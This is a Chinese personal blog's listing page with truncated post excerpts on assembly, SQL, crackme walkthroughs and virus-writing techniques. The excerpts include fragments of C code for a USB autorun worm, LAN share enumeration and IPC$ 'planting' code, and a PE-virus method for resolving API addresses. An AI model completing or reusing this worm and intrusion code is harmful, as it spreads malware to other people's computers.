- 博客(15)
- 资源 (6)
- 收藏
- 关注
RSS订阅原创 防止长草。。。
真的有阵子没鼓捣这里了。。没时间折腾了。反正这里基本上已经荒了,好吧,最近常使用的blog:http://zhkza99c.wordpress.com.cn另一个荒芜的地界儿。。。http://www.cnitblog.com/zhkza99c
2009-04-30 19:42:00
1101
转载 搜索局域网的共享目录
代码一是无花果大哥很早前写的,还有网上这段IPC种植代码.应该对你有帮助.; wsprintf(buf,"////%s//ipc$",host); ZeroMemory(&ns,sizeof(ns)); ns.dwScope=RESOURCE_GLOBALNET; ns.dwType=RESOURCETYPE_ANY; ns.dwDisplayType=RESOURCEDISPL
2007-10-13 12:52:00
1058
2
原创 一些蠕虫的写法。。
下面是最常见的感染U盘的代码,很好理解,网上的代码,没有改。void cfile(LPCTSTR drivers){HANDLE hCFN;char ch1[MAX_PATH];DWORD filesize1 , wsize;wsprintf(ch1,"%sautorun.inf",drivers);char autorunc[]="[AutoRun] /n open=Recycled//note
2007-10-07 15:33:00
7248
原创 最近的事.
马上就要考试了,还在做软件工程数据库的实验,快蹦了..VC使用ADO连的SQL,机房的破地方SQL都不能正常使用.我太阳啊...功能除了买单基本完成,现在是文档状态~~
2007-06-27 17:05:00
806
1
转载 精妙Sql语句(总结以前的所有精华)
asc 按升序排列desc 按降序排列下列语句部分是Mssql语句,不可以在access中使用。SQL分类: DDL—数据定义语言(CREATE,ALTER,DROP,DECLARE) DML—数据操纵语言(SELECT,DELETE,UPDATE,INSERT) DCL—数据控制语言(GRANT,REVOKE,COMMIT,ROLLBACK)首先,简要介绍基础语句:1、说明:创建
2007-05-08 19:09:00
630
原创 非调用手法获取API
使用非调用手法获取API,其实是PE病毒的基本手段之一。搜索输出表,导出GetModuleHandle,LoadLibraryA,GetProcAddress函数的地址,然后用LoadLibraryA调用USER32.DLL,然后再使用GetProcAddress得到MessageBoxA()的函数,得到输出框。GetModuleHandle暂时没用到。。。汗一个。 .386.mode
2007-04-10 19:29:00
942
1
原创 学校一混论坛老师的话,觉的很有用..记下..
罗云彬虽然进局子里去了,但他的32位汇编的书还是值得一看的,学习汇编指令不难,技巧也容易掌握,用DASM分析一些程序就可以了,90年的时候386还没流行起来,所以8086的书是比较成熟的,不过那本书里的部分说法有点问题,我在编程时涉及到N多的图像操作,没有觉得低位在前和低位在后有什么不对劲的,只不过要将屏幕内容输出到打印机就需要按位取出并转换了(因为打印时是竖排,显示是横排),程序代码并不长,典型
2007-01-03 20:30:00
1035
转载 都是小问题..以后集合到一起发.
call procname procname: push ebp ; preserve base pointer mov ebp, esp ; stack pointer into ebp ; write your assembler code here mov esp, ebp ; restore stack p
2006-12-18 13:10:00
649
转载 TEST EAX,EAX问题
在一些破解的文章中,会出现下面的情况:00401098 50 push eax :00401099 8BCF mov ecx, edi :00401056 52 push edx :00401057 8BC8 mov ecx, eax :00401059 E8021D0100 call 00412D60 :0040105E 85C0 te
2006-12-18 13:05:00
1802
转载 COM文件格式
COM文件不允许分段,所占有的空间不允许超过64KB,其入口点(开始运行的起始点)必须是100H(其前面的256个字节为程序前缀所在地),且不必设置堆栈段.在程序装入时,由系统自动把SP建立在该段之末.对所有的过程应定义为NEAR属性. 标准格式:program SEGMENT ORG 100H ASSUME CS : progra
2006-12-18 13:02:00
4456
1
原创 牢骚下子...
继CRACK后对VIRUS产生了浓厚的兴趣,努力攻关PE文件头中....其他的暂且搁置.还有春节回来后就要准备考研了,不能随便看自己喜欢的书了,真是一件XX的事情...本来不打算考研....看了招聘会后突然发现丫的这社会不考研简直让人很不爽....虽然考了研也很不爽..反正先考吧.又沦为可怜的考生了...PS.四级啊...怎么上次就没过呢.这就产生疑问了...连外文
2006-11-20 11:18:00
672
原创 第二次尝试CRACK...
看雪提供的一个习题,试着做了下,晕头转向的,追啊追看着004010B0 处的CALL超级不顺眼,在00401099下了断,跟进了004010B0到了004010C9,然后是分析算法. 00401099 |. 6A 0A PUSH 0A
2006-10-23 17:15:00
762
原创 第一次 CRACK ME,试手试手~
第一次暴力破解,算法分析得头痛 了 ,回头再说,爆破就爆破吧.先用OD打开ncrackme.exe,然后F9运行下来,程序断到用户名和密码处,我输入了name: zhkza99c,key:0123cat,好象对爆破没啥作用哈,管他,弹出Registration fail,好的,用字符串查找定位到:00401095 向上看看,关键跳转找到~00401072 75 1B
2006-10-21 15:31:00
1558
原创 一个日历小程序.
#include#define Sunday 0#define Monday 1#define Tuesday 2#define Wednesday 3#define Thursday 4#define Friday 5#define Saturday 6void GiveInstructions(void);/*输出介绍*/int GetYearFromUser(void);/*用户输入年份*/
2006-06-05 17:52:00
1308
原创 关于系统内核的东西
http://linux.insigma.com.cn/rjxz.asp Linux兼容内核相关下载: 实现系统调用进入/退出机制的源代码
2006-06-02 17:28:00
899
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人